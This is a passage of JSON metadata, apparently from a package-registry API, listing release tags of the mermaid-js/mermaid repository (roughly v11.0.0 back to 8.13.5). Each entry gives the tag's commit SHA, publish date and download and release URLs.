":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g